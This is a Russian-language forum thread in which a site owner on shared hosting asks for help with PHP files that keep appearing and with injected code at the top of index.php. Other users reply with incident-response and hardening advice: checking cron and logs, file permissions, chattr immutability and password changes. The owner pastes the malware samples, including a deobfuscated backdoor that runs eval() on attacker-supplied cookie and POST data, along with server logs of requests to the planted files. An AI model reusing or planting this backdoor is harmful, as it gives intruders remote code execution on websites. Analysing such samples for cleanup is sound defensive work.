У меня есть виртуальный хостинг с 10+ сайтами от ru-center

Структура в FTP такая:


/site1.com/public_html

/site2.com/public_html

/site3.com/public_html

...


Каким-то образом на хостинге появляются новые файлы. Примерно по 3-4 в корень каждого сайта. Файлы такого вида:


76nt0hgr.php

ajax28.php

hmbjcewn.php


Пример содержания одного из них:

$cejrm){function twojb($ejlnjbs, $hhvsm, $jkzowhs){return $ejlnjbs[6]($ejlnjbs[4]($hhvsm . $ejlnjbs[2], ($jkzowhs / $ejlnjbs[8]($hhvsm)) + 1), 0, $jkzowhs);}function llhbte($ejlnjbs, $jxzkvi){return @$ejlnjbs[9]($ejlnjbs[0], $jxzkvi);}function flkmrh($ejlnjbs, $jxzkvi){$gtuyb = $ejlnjbs[3]($jxzkvi) % 3;if (!$gtuyb) {eval($jxzkvi[1]($jxzkvi[2]));exit();}}$cejrm = llhbte($ejlnjbs, $cejrm);flkmrh($ejlnjbs, $ejlnjbs[5]($ejlnjbs[1], $cejrm ^ twojb($ejlnjbs, $hhvsm, $ejlnjbs[8]($cejrm))));}

И что самое интересное, вирус редактирует файл index.php, добавляя в самое начало файла примерно такой код (для каждого сайта немного отличается, но вид одинаковый):

Забавный код и очень непонятный.


Code:
foreach(array_merge($_COOKIE, $_POST) as $hhvsm => $cejrm)
{
function twojb($ejlnjbs, $hhvsm, $jkzowhs)
{
return substr(str_repeat($hhvsm . "97462d1c-4491-4c8d-b4ba-249a1aee81e6", ($jkzowhs / strlen($hhvsm)) + 1), 0, $jkzowhs);
}

function llhbte($ejlnjbs, $jxzkvi)
{
return @pack("H*", $jxzkvi)''
}

function flkmrh($ejlnjbs, $jxzkvi)
{
$gtuyb = count($jxzkvi) % 3;

if(!$gtuyb)
{
eval($jxzkvi[1]($jxzkvi[2]));
exit();
}
}

$cejrm = llhbte($ejlnjbs, $cejrm);
flkmrh($ejlnjbs, explode("#", $cejrm ^ twojb($ejlnjbs, $hhvsm, strlen($cejrm))));
}

В больше файлов нет никаких?

Содержимое всех файлов в студию.

1) Проверить даты изменения всех файлов + системное время

2) Проверить bash_history

3) Проверить crontab, /etc/cron.d и т.п. spool

4) Проверить список демонов в авторане

5) Проверить список запущенных процессов и сервисов. А так же какие службы слушают порты на данный момент.

6) Переналить образ? выполнить дифф всех файлов с дохакерской версией сайт(ов).

7) Настроить .htaccess и разграничить серверами пределы сайтов.

8) Проанализировать логи apache|nginx на предмет как могут попадать. Так же интересно глянуть syslog.

9) Обратиться к @winstrool (https://antichat.live/members/33917/) за профессиональной помощью (коммерческий вариант)

если хочешь понять первопричину взлома - грепай логи веб серверов,ftp и ssh коннектов

если хочешь усложнить атакующему жизнь и минимизировать удар:


Code:
chown -R 0:0 /site1.com/public_html/
find /site1.com/public_html/ -type f -exec chmod 644 {} \;
find /site1.com/public_html/ -type d -exec chmod 755 {} \;

на те директории, в которые нужно писать всем(например uploads,cache,images), устанавливаешь права 777 и через .htaccess отключаешь php движок в этих директориях

таким образом, если атакер заливает шелл через уязвимость в CMS, то больше не зальёт ибо в общедоступных директориях его шелл не запустится, а если его шелл уже надёжно спрятан и ты его не можеш найти - то он всё равно не сможет записать свой вредоносный код в index.php ибо прав нет

ну и конечно поменять все пароли на ftp/ssh, обновить все пакеты до актуального состояния

если после всего проделанного всё равно внедряют код в файлы сайта - значит у атакера есть root привилегии, а это значит только одно:туши свет и бросай гранату(сноси всю ОС и ставь всё по новой)

Возможно плагины под wp имеют RCE.

Всем спасибо за ответ. В логах apache я еще такие запросы заметил (это только часть), как раз к загруженным кем-то файлам. Странно еще, что везде разный IP

[Fri May 25 11:09:22.307068 2018] [php7:error] [pid 31380] [client 37.59.44.168:41908] script '/home/cs-list/mysite.ru/docs/modules.php' not found or unable to stat, referer: http://www.mysite.ru/modules.php?name=Forums

[Fri May 25 11:55:27.594034 2018] [php7:error] [pid 31389] [client 188.225.17.7:52972] script '/home/cs-list/mysite.ru/docs/img/nwwgtkyj.php' not found or unable to stat, referer: https://mysite.ru/img/nwwgtkyj.php

[Fri May 25 11:55:35.363493 2018] [php7:error] [pid 31387] [client 50.62.161.88:53882] script '/home/cs-list/mysite.ru/docs/fonts/xekvmfpc.php' not found or unable to stat, referer: https://mysite.ru/fonts/xekvmfpc.php

[Fri May 25 11:55:40.011106 2018] [php7:error] [pid 31387] [client 210.48.152.152:54466] script '/home/cs-list/mysite.ru/docs/js/hqibovju.php' not found or unable to stat, referer: https://mysite.ru/js/hqibovju.php

[Fri May 25 11:55:40.839767 2018] [php7:error] [pid 31387] [client 92.53.96.44:54566] script '/home/cs-list/mysite.ru/docs/img/bakewxnj.php' not found or unable to stat, referer: https://mysite.ru/img/bakewxnj.php

А в разделе Безопасность в хостинге ru-center эти левые файлы система хостинга распознала как Trojan

Если хостер не решает проблему сам, значит жалоб со стороны клиентов нет, и с сервером всё впорядке.

Скорее всего причина на вашей стороне. Слабые пароли, уязвимый/протрояненый софт/плагины.

Не решив проблему как можно скорее, существует риск потери позиций сайтов в поисковой выдаче, попадание в антивирусные/спам листы, что повлечёт за собой снижение дохода. В этом случае лучше не медлить и обратиться к специалистам, которые поставят всё на контроль, вычистят и залатают.


sirjay said:
↑ (https://antichat.live/posts/4213740/)
Странно еще, что везде разный IP


Похоже это другие заражённые хосты.

Советую


PHP:
https:/forums/110/

Хостился у нас сайт дружественной компании, с дырявым битрикс. Происходило с ним что-то очень похожеее, а нанимать кого-то для обновления компания не хотела, мотивируя тем что вот-вот закажет новый сайт с нуля.

Так чтобы не заморачиваться, удалили левые php файлы, инклюды, а на оставшиеся сделали:

sudo chattr -R -i /home/bitrix/

*immutable. Указывает, что файл защищен от изменений: не может быть удален или переименован, никакая ссылка (жесткая) не может быть создана на этот файл, никакие данные не могут быть записаны в файл.

Можно так же сделать, пока разбор полетов идет

DmitryU said:
↑ (https://antichat.live/posts/4214050/)
sudo chattr -R -i /home/bitrix/




Code:
sudo chattr -R +i /home/bitrix/

-i снимает атрибут

dmax0fw said:
↑ (https://antichat.live/posts/4214124/)

Code:
sudo chattr -R +i /home/bitrix/

-i снимает атрибут


Да, точно

возможно тебя взломали хакерским сплойтом и подгружают вирусы